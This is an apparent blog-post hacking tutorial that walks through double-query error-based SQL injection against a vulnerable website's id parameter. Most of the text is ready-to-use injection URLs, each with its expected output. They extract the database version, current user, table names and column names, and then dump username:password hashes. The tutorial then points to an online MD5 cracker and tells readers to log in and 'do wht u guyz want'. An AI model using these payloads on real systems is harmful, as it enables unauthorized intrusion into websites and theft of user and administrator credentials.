Sql injection [Double Query Error Based]

Sql injection [Double Query Error Based]

Asalam O Alaikum

This tutorial is about how to hack a website through Sql injection Double Query Error Based

So for this first you need a vulnerable site..

ok after getting a vulnerable site as a normal you get the column counts

suppose it has 4 columns so next your command will be

Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
but when you press enter it gives error :-0

the error is
Code:
(select statement have different numbers of column)

so now what????? Angry

don't be so confused its time for using double query Sql injection

so your command will look like this:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0​,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

and result will look like this

Code:
"Duplicate entry '5.0.92-community-log1' for key 1"

so here '5.0.92-community-log1' is sites version.


now we have to find sites current_user so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+li​mit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)


result
Code:
"Duplicate entry user+1' for key 1"


ok now we will find tables by this command :-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+​0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result should be
Code:
"duplicate entry 'table_name1' for key 1'

now keep increasing the limit you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
here change the limit '0,1'to 1,1 then 2,1 until you get the error.


ok now we will find tables which contains the data so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+​table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.ta​bles+group+by+a)b)

result
Code:
"duplicate entry tablename1' for key 1"

so here again increase the limits value until you get the table like user,,admin,,login etc etc.. Tongue

ok now suppose we have table name "user" so next step is to find columns of this table our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+wher​e+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'column name1' for key 1'

you can change text to hex here>> http://www.swingnote.com/tools/texttohex.php

again keep changing limits value untill you get columns like username,password etc :/

ok now we have columns username and password we need the data inside the columns so our command will be:-

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floo​r(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
if the password is in hashes then you have to crack that hash
u can crack that hash with a site namely
Code:
http://md5decrypter.co.uk
so u can crack the hash
so u got user and pass login do wht u guyz want nd enjoy Big Grin 

POSTED BY HASAN AFAQUE (Admin)

Post a Comment

Dear Lovers Comment

Previous Post Next Post

Post Ads 1

Post Ads 2